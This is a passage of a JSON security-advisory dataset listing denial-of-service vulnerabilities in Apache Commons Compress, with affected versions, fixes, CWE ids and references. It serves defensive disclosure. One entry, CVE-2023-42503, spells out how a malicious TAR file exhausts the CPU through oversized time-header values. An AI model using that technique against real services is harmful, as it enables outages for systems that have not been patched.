"org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.4.1" } ] } ], "versions": [ "1.0", "1.1", "1.2", "1.3", "1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-6fxm-66hq-fc96/GHSA-6fxm-66hq-fc96.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-2098" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/020c03d8ef579e80511023fb46ece30e9c3dd27d" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/0600296ab8f8a0bbdfedd483f51b38005eb8e34e" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/1ce57d976c4f25fe99edcadf079840c278f3cb84" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/2ab2fcb356753927afaa731b9d2dcc47d3083408" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/654222e628097763ee6ca561ae77be5c06666173" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/6ced422bf5eca3aac05396367bafb33ec21bf74e" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/6e95697e783767f3549f00d7d2e1b002eac4a3d4" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/8f702469cbf4c451b6dea349290bc4af0f6f76c7" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/b06f7b41c936ef1a79589d16ea5c1d8b93f71f66" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/cca0e6e5341aacddefd4c4d36cef7cbdbc2a8777" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/ea31005111f0abede7e43e4ba0012e62e0808b22" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/fdd7459bc5470e90024dbe762249166481cce769" }, { "type": "WEB", "url": "https://web.archive.org/web/20140724002926/http://secunia.com/advisories/49286" }, { "type": "WEB", "url": "https://web.archive.org/web/20140724023114/http://secunia.com/advisories/49255" }, { "type": "WEB", "url": "https://web.archive.org/web/20200517014414/http://www.securitytracker.com/id?1027096" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20130525085523/http://www.securityfocus.com/bid/53676" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@\u003csolr-user.lucene.apache.org\u003e" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-compress" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75857" }, { "type": "WEB", "url": "http://ant.apache.org/security.html" }, { "type": "WEB", "url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0130.html" }, { "type": "WEB", "url": "http://commons.apache.org/compress/security.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081697.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081746.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2013-May/105049.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2013-May/105060.html" }, { "type": "WEB", "url": "http://packetstormsecurity.org/files/113014/Apache-Commons-Compress-Apache-Ant-Denial-Of-Service.html" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21644047" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/09/13/3" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-07-13T21:10:51Z", "nvd_published_at": "2012-06-29T19:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-7hfm-57qf-j43q", "published": "2021-08-02T16:55:07Z", "modified": "2024-03-08T05:18:24.619639Z", "aliases": [ "CVE-2021-35515" ], "summary": "Excessive Iteration in Compress", "details": "When reading a specially crafted 7Z archive, the construction of the list of codecs that decompress an entry can result in an infinite loop. This could be used to mount a denial of service attack against services that use Compress' sevenz package.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.21" } ] } ], "versions": [ "1.0", "1.1", "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.16.1", "1.17", "1.18", "1.19", "1.2", "1.20", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.7", "1.8", "1.8.1", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-7hfm-57qf-j43q/GHSA-7hfm-57qf-j43q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35515" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20211022-0001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf2f4d7940371a7c7c5b679f50e28fc7fcc82cd00670ced87e013ac88@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbe91c512c5385181149ab087b6c909825d34299f5c491c6482a2ed57@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbaea15ddc5a7c0c6b66660f1d6403b28595e2561bb283eade7d7cd69@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab292091eadd1ecc63c516e9541a7f241091cf2e652b8185a6059945@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r19ebfd71770ec0617a9ea180e321ef927b3fefb4c81ec5d1902d20ab%40%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-compress/security-reports.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/07/13/1" } ], "database_specific": { "cwe_ids": [ "CWE-834", "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2021-07-14T17:35:41Z", "nvd_published_at": "2021-07-13T08:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cgwf-w82q-5jrr", "published": "2023-09-14T09:30:28Z", "modified": "2025-02-13T19:34:19.488773Z", "aliases": [ "CVE-2023-42503" ], "related": [ "CGA-6gcx-2g6m-pvm8", "CGA-793c-mm63-qv25" ], "summary": "Apache Commons Compress denial of service vulnerability", "details": "Improper Input Validation, Uncontrolled Resource Consumption vulnerability in Apache Commons Compress in TAR parsing.This issue affects Apache Commons Compress: from 1.22 before 1.24.0.\n\nUsers are recommended to upgrade to version 1.24.0, which fixes the issue.\n\nA third party can create a malformed TAR file by manipulating file modification times headers, which when parsed with Apache Commons Compress, will cause a denial of service issue via CPU consumption.\n\nIn version 1.22 of Apache Commons Compress, support was added for file modification times with higher precision (issue # COMPRESS-612 [1]). The format for the PAX extended headers carrying this data consists of two numbers separated by a period [2], indicating seconds and subsecond precision (for example “1647221103.5998539”). The impacted fields are “atime”, “ctime”, “mtime” and “LIBARCHIVE.creationtime”. No input validation is performed prior to the parsing of header values.\n\nParsing of these numbers uses the BigDecimal [3] class from the JDK which has a publicly known algorithmic complexity issue when doing operations on large numbers, causing denial of service (see issue # JDK-6560193 [4]). A third party can manipulate file time headers in a TAR file by placing a number with a very long fraction (300,000 digits) or a number with exponent notation (such as “9e9999999”) within a file modification time header, and the parsing of files with these headers will take hours instead of seconds, leading to a denial of service via exhaustion of CPU resources. This issue is similar to CVE-2012-2098 [5].\n\n[1]: https://issues.apache.org/jira/browse/COMPRESS-612 \n[2]: https://pubs.opengroup.org/onlinepubs/9699919799/utilities/pax.html#tag_20_92_13_05 \n[3]: https://docs.oracle.com/javase/8/docs/api/java/math/BigDecimal.html \n[4]: https://bugs.openjdk.org/browse/JDK-6560193 \n[5]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2098 \n\nOnly applications using CompressorStreamFactory class (with auto-detection of file types), TarArchiveInputStream and TarFile classes to parse TAR files are impacted. Since this code was introduced in v1.22, only that version and later versions are impacted.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.22" }, { "fixed": "1.24.0" } ] } ], "versions": [ "1.22", "1.23.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-cgwf-w82q-5jrr/GHSA-cgwf-w82q-5jrr.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42503" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/aae38bfb820159ae7a0b792e779571f6a46b3889" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-compress" }, { "type": "WEB", "url": "https://lists.apache.org/thread/5xwcyr600mn074vgxq92tjssrchmc93c" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231020-0003" } ], "database_specific": { "cwe_ids": [ "CWE-20", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-09-14T19:35:27Z", "nvd_published_at": "2023-09-14T08:15:08Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-crv7-7245-f45f", "published": "2021-08-02T16:55:15Z", "modified": "2024-03-08T05:19:35.252507Z", "aliases": [ "CVE-2021-35516" ], "summary": "Improper Handling of Length Parameter Inconsistency in Compress", "details": "When reading a specially crafted 7Z archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' sevenz package.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.21" } ] } ], "versions": [ "1.0", "1.1", "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.16.1", "1.17", "1.18", "1.19", "1.2", "1.20", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.7", "1.8", "1.8.1", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-crv7-7245-f45f/GHSA-crv7-7245-f45f.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35516" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20211022-0001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf68442d67eb166f4b6cf0bbbe6c7f99098c12954f37332073c9822ca%40%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5b1016fb15b7118b9a5e16bb0b78cb4f1dfcf7821eb137ab5757c91@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba65ed5ddb0586f5b12598f55ec7db3633e7b7fede60466367fbf86a@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-compress/security-reports.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/07/13/2" } ], "database_specific": { "cwe_ids": [ "CWE-130", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2021-07-14T18:11:52Z", "nvd_published_at": "2021-07-13T08:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h436-432x-8fvx", "published": "2019-03-14T15:41:12Z", "modified": "2024-02-27T18:34:05.707371Z", "aliases": [ "CVE-2018-1324" ], "summary": "Apache Commons Compress vulnerable to denial of service due to infinite loop", "details": "A specially crafted ZIP archive can be used to cause an infinite loop inside of Apache Commons Compress' extra field parser used by the ZipFile and ZipArchiveInputStream classes in versions 1.11 to 1.15. This can be used to mount a denial of service attack against services that use Compress' zip package.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.11" }, { "fixed": "1.16" } ] } ], "versions": [ "1.11", "1.12", "1.13", "1.14", "1.15" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-h436-432x-8fvx/GHSA-h436-432x-8fvx.json" } }, { "package": { "name": "com.liferay:com.liferay.portal.tools.bundle.support", "ecosystem": "Maven", "purl": "pkg:maven/com.liferay/com.liferay.portal.tools.bundle.support" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.2.7" }, { "fixed": "3.7.4" } ] } ], "versions": [ "3.2.7", "3.3.0", "3.4.0", "3.4.1", "3.4.2", "3.4.3", "3.5.0", "3.5.1", "3.5.2", "3.5.3", "3.5.4", "3.5.5", "3.5.6", "3.6.0", "3.6.1", "3.7.0", "3.7.1", "3.7.2", "3.7.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-h436-432x-8fvx/GHSA-h436-432x-8fvx.json" } }, { "package": { "name": "io.takari:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/io.takari/commons-compress" }, "versions": [ "1.12" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-h436-432x-8fvx/GHSA-h436-432x-8fvx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1324" }, { "type": "WEB", "url": "https://github.com/apache/commons-compress/commit/2a2f1dc48e22a34ddb72321a4db211da91aa933b" }, { "type": "WEB", "url": "https://arxiv.org/pdf/2306.05534.pdf" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-h436-432x-8fvx" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-compress" }, { "type": "WEB", "url": "https://github.com/jensdietrich/xshady-release/tree/main/CVE-2018-1324" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1c7b6df6d1c5c8583518a0afa017782924918e4d6acfaf23ed5b2089@%3Cdev.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b8ef29df0f1d55aa741170748352ae8e425c7b1d286b2f257711a2dd@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5532dc8d5456b5151e8c286801e2e5769f5c04118b29c3b5d13ea387@%3Cissues.beam.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:38:39Z", "nvd_published_at": "2018-03-16T13:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hrmr-f5m6-m9pq", "published": "2018-10-19T16:41:27Z", "modified": "2024-06-05T17:33:15.862538Z", "aliases": [ "CVE-2018-11771" ], "summary": "Moderate severity vulnerability that affects org.apache.commons:commons-compress", "details": "When reading a specially crafted ZIP archive, the read method of Apache Commons Compress 1.7 to 1.17's ZipArchiveInputStream can fail to return the correct EOF indication after the end of the stream has been reached. When combined with a java.io.InputStreamReader this can lead to an infinite stream, which can be used to mount a denial of service attack against services that use Compress' zip package.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.7" }, { "fixed": "1.18" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.16.1", "1.17", "1.7", "1.8", "1.8.1", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-hrmr-f5m6-m9pq/GHSA-hrmr-f5m6-m9pq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11771" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9cdd32af7d73e943452167d15801db39e8130409ebb9efb243b3f41@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f28052d04cb8dbaae39bfd3dc8438e58c2a8be306a3f381f4728d7c1@%3Ccommits.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eeecc1669242b28a3777ae13c68b376b0148d589d3d8170340d61120@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e3eae9e6fc021c4c22dda59a335d21c12eecab480b48115a2f098ef6@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c7954dc1e8fafd7ca1449f078953b419ebf8936e087f235f3bd024be@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b907e70bc422905d7962fd18f863f746bf7b4e7ed9da25c148580c61@%3Cnotifications.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b8ef29df0f1d55aa741170748352ae8e425c7b1d286b2f257711a2dd@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b8da751fc0ca949534cdf2744111da6bb0349d2798fac94b0a50f330@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/714c6ac1b1b50f8557e7342903ef45f1538a7bc60a0b47d6e48c273d@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6c79965066c30d4e330e04d911d3761db41b82c89ae38d9a6b37a6f1@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/35f60d6d0407c13c39411038ba1aca71d92595ed7041beff4d07f2ee@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3565494c263dfeb4dcb2a71cb24d09a1ca285cd6ac74edc025a3af8a@%3Ccommits.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0adb631517766e793e18a59723e2df08ced41eb9a57478f14781c9f7@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-compress" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/105139" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1041503" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:40:55Z", "nvd_published_at": "2018-08-16T15:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mc84-pj99-q6hh", "published": "2021-08-02T16:55:53Z", "modified": "2024-03-08T05:19:48.954731Z", "aliases": [ "CVE-2021-36090" ], "summary": "Improper Handling of Length Parameter Inconsistency in Compress", "details": "When reading a specially crafted ZIP archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' zip package.", "affected": [ { "package": { "name": "org.apache.commons:commons-compress", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-compress" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.21" } ] } ], "versions": [ "1.0", "1.1", "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.16.1", "1.17", "1.18", "1.19", "1.2", "1.20", "1.3", "1.4", "1.4.1", "1.5", "1.6", "1.7", "1.8", "1.8.1", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-mc84-pj99-q6hh/GHSA-mc84-pj99-q6hh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36090" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-compress/security-reports.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbbf42642c3e4167788a7c13763d192ee049604d099681f765385d99d@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbe91c512c5385181149ab087b6c909825d34299f5c491c6482a2ed57@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc4134026d7d7b053d4f9f2205531122732405012c8804fd850a9b26f%40%3Cuser.commons.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc7df4c2f0bbe2028a1498a46d322c91184f7a369e3e4c57d9518cacf@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4332baaf6debd03d60deb7ec93bee49e5fdbe958cb6800dff7fb00e@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd5412a5b9a25aed2a02c3317052d38a97128314d50bc1ed36e81d38@%3Cuser.ant.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf2f4d7940371a7c7c5b679f50e28fc7fcc82cd00670ced87e013ac88@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf3f0a09fee197168a813966c5816157f6c600a47313a0d6813148ea6@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf93b6bb267580e01deb7f3696f7eaca00a290c66189a658cf7230a1a@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfba19167efc785ad3561e7ef29f340d65ac8f0d897aed00e0731e742@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20211022-0001" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0e87177f8e78b4ee453cd4d3d8f4ddec6f10d2c27707dd71e12cafc9@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25f4c44616045085bc3cf901bb7e68e445eee53d1966fc08998fc456@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3227b1287e5bd8db6523b862c22676b046ad8f4fc96433225f46a2bd@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4f03c5de923e3f2a8c316248681258125140514ef3307bfe1538e1ab@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54049b66afbca766b6763c7531e9fe7a20293a112bcb65462a134949@%3Ccommits.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75ffc7a461e7e7ae77690fa75bd47bb71365c732e0fbcc44da4f8ff5@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9a23d4dbf4e34d498664080bff59f2893b855eb16dae33e4aa92fa53@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab292091eadd1ecc63c516e9541a7f241091cf2e652b8185a6059945@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5fa2ee61828fa2e42361b58468717e84902dd71c4aea8dc0b865df7@%3Cnotifications.james.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": 